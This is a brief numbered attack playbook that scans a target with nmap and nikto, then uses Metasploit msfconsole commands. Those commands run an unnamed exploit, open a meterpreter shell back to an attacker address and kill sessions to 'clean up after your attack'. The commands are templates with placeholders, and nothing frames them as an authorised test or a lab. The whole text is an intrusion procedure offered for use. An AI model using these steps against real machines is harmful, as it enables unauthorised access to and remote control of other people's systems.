1. Scan for open ports on the target machine: nmap -sV -Pn -T4 -p- <target IP address>
2. Identify services running on open ports: nmap -sV -Pn -T4 -p <target IP address>
3. Determine the attack vector and exploit type: nikto -h <target IP address>
4. Run the exploit: msfconsole -x “use <exploit type>; set RHOST <target IP address>; set LHOST <attacker IP address>; exploit”
5. Execute commands: use post/multi/manage/shell_to_meterpreter; set LHOST <attacker IP address>; set RHOST <target IP address>; exploit
6. Clean up after your attack: msfconsole -x “sessions -K”
